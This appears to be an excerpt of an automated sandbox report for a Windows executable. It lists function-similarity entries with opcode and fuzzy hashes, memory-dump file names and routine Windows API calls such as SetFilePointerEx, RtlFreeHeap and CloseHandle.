                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        • Opcode ID: 823bef23182f8f61d7efa7880482c28a4a7867c446eada0463010af46261c3c5
                                                                                                                                                                                                                                                        • Instruction ID: 3fc163b97f293ed552f6b7da1bd5fd5a8d6d6d8f8a9cb3a9209dfa01295ac804
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 823bef23182f8f61d7efa7880482c28a4a7867c446eada0463010af46261c3c5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8D05E50B0A64283EB042B709C6423C0211CF8C740F011538CA8FC23B3ED3CA4584604
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 141dc46c6224036006d776e19841065f05dd1418e65b387591b1a003cf84bd0f
                                                                                                                                                                                                                                                        • Instruction ID: 22109f6c8ab81f5c77ce8e99f53085c9042343b1a37f49667c6263ce43562b81
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 141dc46c6224036006d776e19841065f05dd1418e65b387591b1a003cf84bd0f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2551E862B0B68686FA289E25940067E6691FF4CBA4F145734DF6D877F9EF3ED4018700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1236291503-0
                                                                                                                                                                                                                                                        • Opcode ID: bbbb43f9e1356fc36a8983c03ebcc8b7addcb0e166801d8c410c30bb16f29642
                                                                                                                                                                                                                                                        • Instruction ID: 2f29c69b747646769838ecfddd21a5b126da3b523451c0a09e2ce490c2ace07d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbbb43f9e1356fc36a8983c03ebcc8b7addcb0e166801d8c410c30bb16f29642
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A315721E0E24282FB54ABA9E5153B96791EF4DB84F445035EB4EC76F3FE6CB9048244
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3000768030-0
                                                                                                                                                                                                                                                        • Opcode ID: b01a8b1655aeb6f71db35254c5ecf6a703e147159c44eee076082fbba724bcfb
                                                                                                                                                                                                                                                        • Instruction ID: f88c03535a90f00182cb3efb263ef5536e7a2bf4f8599f1bcd8a7e5b5d122db4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b01a8b1655aeb6f71db35254c5ecf6a703e147159c44eee076082fbba724bcfb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8231B331A1AF4692E7208B1585805796A50FB49BB0F681379DBAE973F0DF38E571D304
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6ABA5D020,?,?,?,?,?,00007FF6ABA5D129), ref: 00007FF6ABA5D080
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00007FF6ABA5D020,?,?,?,?,?,00007FF6ABA5D129), ref: 00007FF6ABA5D08A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        • Opcode ID: fb6a81950565da05b050a92576ed7c02e19ce8787ed1f1a96796d90f6b6408b2
                                                                                                                                                                                                                                                        • Instruction ID: 3cafbb5be4c0067f6c5f3ff07a506ad0dfbb563831982135aa851c8b3598dbae
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb6a81950565da05b050a92576ed7c02e19ce8787ed1f1a96796d90f6b6408b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13110161A08B8281DA108B25B400069A361EB48FF4F540331EFBE8BBF9EF3CD1658708
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6ABA567F5), ref: 00007FF6ABA56913
                                                                                                                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6ABA567F5), ref: 00007FF6ABA56929
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1707611234-0
                                                                                                                                                                                                                                                        • Opcode ID: 2039fd83e8b56068fe4c14b51341d05702151df0dd8c41e9036d506d0e0dfe63
                                                                                                                                                                                                                                                        • Instruction ID: 6beef1810ea4a7ce9efc79aaa6a1b37512f40c32a8de44e8c31a16747b625287
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2039fd83e8b56068fe4c14b51341d05702151df0dd8c41e9036d506d0e0dfe63
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE118C7260D652C1EA648B19A41113EB7A0FB897A1F60033AFBADC19F8FF6CD154CB00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B47A
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B484
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                        • Opcode ID: bcb6ed366288f57e679071cac10841f4f6d99062b1a4c36b0c72b5ea8c3cbe48
                                                                                                                                                                                                                                                        • Instruction ID: ded819cd92b9abd95d17113dabf9138580577de22efe41842decb04c86731efc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcb6ed366288f57e679071cac10841f4f6d99062b1a4c36b0c72b5ea8c3cbe48
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE0ECB2F0BA4286FF29AFF298551781161DF8C781F448634DF0DCA272FE2DBA954214
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF6ABA5B8DD,?,?,00000000,00007FF6ABA5B992), ref: 00007FF6ABA5BACE
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6ABA5B8DD,?,?,00000000,00007FF6ABA5B992), ref: 00007FF6ABA5BAD8
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                        • Opcode ID: ee1f6f2c17bcac9912aebe9a75d3c59e1af1689cfc13c1c78b5a219ca8e97850
                                                                                                                                                                                                                                                        • Instruction ID: dc555d16741706d1cfbafb29c7acafe901ad7a550ed2a0d90e4a4b81a3e05666
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee1f6f2c17bcac9912aebe9a75d3c59e1af1689cfc13c1c78b5a219ca8e97850
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7421C622F0A68242FE505B65A59027D1281EF8C7A1F844335EB6ECBBF2FE6DE5454308
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: e4b37d1ac90d15cfb184970c58ebde71eef6bb39a30608cbf4500616c80da583
                                                                                                                                                                                                                                                        • Instruction ID: 02767e64f9bc52d3801e4c7879d2baeebea4c1c2a7b332735cebbd4b352a097d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4b37d1ac90d15cfb184970c58ebde71eef6bb39a30608cbf4500616c80da583
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB41D03390A24187EB348B29A54027977A0EB5DB91F100331EB8EC3AA5FF3DE642C755
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                        • Opcode ID: 61035029c139f780a5569dd457c9cf41cb59d31def6763437cd94ac2d75dcbd5
                                                                                                                                                                                                                                                        • Instruction ID: 61c62726d57c7e8e5f82d6f120fe7a10a9d108d376983c5539ba65f0b7afff76
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61035029c139f780a5569dd457c9cf41cb59d31def6763437cd94ac2d75dcbd5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2521A631B0A6D245FA10DA1265043BAAA41FF4DBD4F885830EF4D87797EE7DE141C300
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 91dc31986c532176c65ca0e3ff35a3bba52d03db3277bf6d72548c5eb48738d3
                                                                                                                                                                                                                                                        • Instruction ID: f3959fc97cf215202e0d8215a6b5345ae59895e275fd991176005852b5f6584c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91dc31986c532176c65ca0e3ff35a3bba52d03db3277bf6d72548c5eb48738d3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73318E32A1EA1295E7116B5598413BC2690FF4CBA0F410335EB1D873F6FE7DE6818758
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                        • Opcode ID: 78c35fc7c6e2b8000ddfa863f9affaf41ca53d2f0572e0ba78e1a207ed009a92
                                                                                                                                                                                                                                                        • Instruction ID: dce640719d4503ce1d5fa6aa9cabe1e83d44a2036ad02794f6a3a1fc57480a28
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78c35fc7c6e2b8000ddfa863f9affaf41ca53d2f0572e0ba78e1a207ed009a92
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B218D32B06695CAEB249FA4C4402AC33A0FB08358F050635D76D86AE5EF38D744C744
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 0e1df9a836e05c53306103cf914f9f5afd0b17d2d4247778ac0f8a736a470cc7
                                                                                                                                                                                                                                                        • Instruction ID: c5b38d2b3b62d4e1cfc8eb94faa2fa745358961953935b629c0b50276afb61eb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e1df9a836e05c53306103cf914f9f5afd0b17d2d4247778ac0f8a736a470cc7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0116332A1F64181EA619F55D40027DA264FF4DB80F844231EF8C97BA6EF7DD6918748
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 705a0604598582430d769309be7d52bb613e0b4e097a3a0cc12fb03a34ef158b
                                                                                                                                                                                                                                                        • Instruction ID: da86c2929f9f08e214f5993817a9bd6c2ab151f9048ec4c553382e3c5258a46a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 705a0604598582430d769309be7d52bb613e0b4e097a3a0cc12fb03a34ef158b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5121A772629A8287DB618F2CE45037976A2FB98B94F544234EB5DC76E6EF3DD4408B00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 43297e0cb54a728217cf8f13d9f8c23c45e2da10c33361e46a2ef0799771412d
                                                                                                                                                                                                                                                        • Instruction ID: 94d620b14c5de21e022fd2a554a5da28f9ec498efbdecbba93dc5ab810bd77d2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43297e0cb54a728217cf8f13d9f8c23c45e2da10c33361e46a2ef0799771412d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4801C422A0974240EA04DB52980117DA694FF9DFE0F4C5631EF6C93BEAEE3DD5018300
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
